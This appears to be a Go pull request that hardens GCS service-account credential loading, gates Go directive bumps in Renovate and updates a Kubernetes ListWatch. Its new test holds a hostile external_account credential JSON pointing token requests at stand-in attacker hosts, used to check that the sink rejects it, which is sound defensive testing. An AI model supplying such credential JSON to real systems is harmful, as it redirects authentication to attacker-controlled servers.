### PR TITLE
fix: harden GCS credential loading and unblock lint on go 1.27

### DIFF
--- a/.github/renovate.json
+++ b/.github/renovate.json
@@ -103,6 +103,21 @@
         "helm"
       ],
       "allowedVersions": "<4.2.1 || >4.2.1"
+    },
+    {
+      "description": "The go.mod language directive gates golangci-lint: it refuses to lint a module targeting a newer Go than the release binary was built with, and staticcheck (honnef.co/go/tools v0.7.0, vendored by golangci-lint v2.12.2) panics on Go 1.27 stdlib source.",
+      "matchManagers": [
+        "gomod"
+      ],
+      "matchDepNames": [
+        "go"
+      ],
+      "groupName": "go directive",
+      "matchUpdateTypes": [
+        "major",
+        "minor"
+      ],
+      "dependencyDashboardApproval": true
     }
   ]
 }

--- a/.github/workflows/go-ci.yml
+++ b/.github/workflows/go-ci.yml
@@ -38,9 +38,6 @@ jobs:
     if: github.event_name == 'pull_request' || github.event_name == 'workflow_dispatch' || github.event_name == 'push'
     runs-on: ubuntu-latest
     timeout-minutes: 30
-    strategy:
-      matrix:
-        go-version: [1.26]
 
     steps:
       - name: Checkout

--- a/internal/kubernetes/nodespawn/stream.go
+++ b/internal/kubernetes/nodespawn/stream.go
@@ -31,11 +31,11 @@ var stuckPodEventThreshold = 5 * time.Second
 func waitForPodRunningOrTerminated(ctx context.Context, clientset kubernetes.Interface, namespace, name string) (*corev1.Pod, error) {
 	fieldSel := fields.OneTermEqualSelector("metadata.name", name).String()
 	lw := &cache.ListWatch{
-		ListFunc: func(opts metav1.ListOptions) (runtime.Object, error) {
+		ListWithContextFunc: func(ctx context.Context, opts metav1.ListOptions) (runtime.Object, error) {
 			opts.FieldSelector = fieldSel
 			return clientset.CoreV1().Pods(namespace).List(ctx, opts)
 		},
-		WatchFunc: func(opts metav1.ListOptions) (watch.Interface, error) {
+		WatchFuncWithContext: func(ctx context.Context, opts metav1.ListOptions) (watch.Interface, error) {
 			opts.FieldSelector = fieldSel
 			return clientset.CoreV1().Pods(namespace).Watch(ctx, opts)
 		},

--- a/internal/reportsink/objectstore/gcs.go
+++ b/internal/reportsink/objectstore/gcs.go
@@ -35,9 +35,8 @@ func newGCSSink(ctx context.Context, cfg Config, d destination) (Sink, error) {
 	var opts []option.ClientOption
 	saJSON := stringFromCreds(creds, gcsSecretKeyServiceAccountJSON)
 	if saJSON != "" {
-		ac, err := credentials.DetectDefault(&credentials.DetectOptions{
-			CredentialsJSON: []byte(saJSON),
-			Scopes:          gcsScopes,
+		ac, err := credentials.NewCredentialsFromJSON(credentials.ServiceAccount, []byte(saJSON), &credentials.DetectOptions{
+			Scopes: gcsScopes,
 		})
 		if err != nil {
 			return nil, fmt.Errorf("gcs: load service account JSON: %w", err)

--- a/internal/reportsink/objectstore/gcs_credential_type_test.go
+++ b/internal/reportsink/objectstore/gcs_credential_type_test.go
@@ -1,0 +1,67 @@
+package objectstore
+
+import (
+	"context"
+	"crypto/rand"
+	"crypto/rsa"
+	"crypto/x509"
+	"encoding/json"
+	"encoding/pem"
+	"strings"
+	"testing"
+)
+
+func TestNewGCSSink_RejectsExternalAccountJSON(t *testing.T) {
+	externalAccount := `{
+  "type": "external_account",
+  "audience": "//iam.googleapis.com/projects/1/locations/global/workloadIdentityPools/p/providers/x",
+  "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
+  "token_url": "https://sts.attacker.example/v1/token",
+  "credential_source": {"url": "https://attacker.example/token"}
+}`
+
+	_, err := New(context.Background(), Config{
+		URI: "gs://bucket/reports/",
+		Credentials: map[string][]byte{
+			gcsSecretKeyServiceAccountJSON: []byte(externalAccount),
+		},
+	})
+	if err == nil {
+		t.Fatal("expected external_account credential JSON to be rejected")
+	}
+	if !strings.Contains(err.Error(), "service account JSON") {
+		t.Errorf("unexpected error: %v", err)
+	}
+}
+
+func TestNewGCSSink_AcceptsServiceAccountJSON(t *testing.T) {
+	key, err := rsa.GenerateKey(rand.Reader, 2048)
+	if err != nil {
+		t.Fatalf("generate key: %v", err)
+	}
+	keyPEM := pem.EncodeToMemory(&pem.Block{
+		Type:  "PRIVATE KEY",
+		Bytes: x509.MarshalPKCS1PrivateKey(key),
+	})
+	saJSON, err := json.Marshal(map[string]string{
+		"type":         "service_account",
+		"project_id":   "podtrace-test",
+		"private_key":  string(keyPEM),
+		"client_email": "reporter@podtrace-test.iam.gserviceaccount.com",
+		"token_uri":    "https://oauth2.googleapis.com/token",
+	})
+	if err != nil {
+		t.Fatalf("marshal service account JSON: %v", err)
+	}
+
+	sink, err := New(context.Background(), Config{
+		URI: "gs://bucket/reports/",
+		Credentials: map[string][]byte{
+			gcsSecretKeyServiceAccountJSON: saJSON,
+		},
+	})
+	if err != nil {
+		t.Fatalf("New (service account JSON): %v", err)
+	}
+	t.Cleanup(func() { _ = sink.Close() })
+}


### PR DESCRIPTION
## Summary

golangci-lint refuses to lint a module whose `go` directive targets a newer Go than the linter binary was built with, so Renovate's `go 1.27.0` bump (#443) breaks CI deterministically. Gate directive bumps behind dashboard approval until upstream ships a Go 1.27 build, and clear the three SA1019 findings that the next golangci-lint release will fail on regardless.

## Changes

- Renovate: minor/major `go` directive bumps now require dependency-dashboard approval and get their own group, so they no longer redden the shared module-update branch. Patch bumps stay automatic.
- GCS report sink: load `service_account_json` via the type-restricted `credentials.NewCredentialsFromJSON` instead of the deprecated `DetectOptions.CredentialsJSON`, which accepted any credential type.
- Pod-wait `ListWatch` moved to `ListWithContextFunc` / `WatchFuncWithContext`; List/Watch now honour the wait deadline instead of the caller's context.
- Dropped the unused `go-version` matrix from `build-and-test`, every step resolves Go from `go.mod`, so it only mislabelled the job.